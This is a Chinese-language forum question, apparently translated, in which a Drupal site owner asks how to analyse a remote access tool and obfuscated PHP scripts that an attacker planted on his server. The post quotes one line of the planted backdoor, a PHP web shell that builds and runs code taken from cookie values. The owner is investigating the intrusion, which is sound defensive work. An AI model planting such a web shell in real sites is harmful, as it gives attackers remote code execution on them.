我有一个在最新的 CentOS 7 LAMP AWS EC2 实例(几个月前新安装)上运行的 drupal 站点,我刚刚发现不知何故,可能是通过从 drupal 站点下载的编码不佳的第 3 方模块并且在没有正确修改的情况下安装,一些黑客设法在站点的根目录中推送了一个看起来像远程访问工具的东西。
我还在站点/默认文件夹中发现了一些混淆的 PHP 脚本。我试过通过http://www.unphp.net/运行它们,但没有运气,它们看起来都像垃圾:
http://www.unphp.net/decode/7f42bdb7c2a96a090a9ec4fdbb1e10a1/
到目前为止,除了这些 PHP 文件之外,一切似乎都已到位,但让我感到困扰的是,我什至不知道它们在做什么。
就这一点translation-main,似乎很清楚它正在执行来自 cookie 的代码:
<?php if(@$_COOKIE['ox']){$blft=$_COOKIE['ox']("",@$_COOKIE['mwov'](@$_COOKIE['lks']));$blft();}?>
我现在应该怎么办?有什么方法可以去混淆代码并监控黑客的活动?我对尽可能多地从这个案例中学习比尽快保护我的服务器更感兴趣,因为它没有任何私人或有价值的东西。
这个问题有何不同:
我不在乎保护我的数据
我不在乎找到攻击者
我没有要通知的客户
我在这台服务器上使用的密码和证书对于服务器来说是唯一的,我没有从它登录到任何其他服务器。
我不需要阻止任何黑客,甚至不需要断开我的服务器与 Internet 的连接。我这样做是为了以防万一,至少在我详细检查了服务器并得出结论我可以监控任何进一步的活动,或者决定我只需要重新安装之前。
我有这种攻击的细节。这不是:哦不!有人在我的服务器上做了什么!它是:有人把这个放在我的服务器上,我知道它是一个远程访问工具,我一直在尝试了解更多关于它的信息,但我被卡住了。任何人都可以帮我弄清楚如何了解更多信息吗?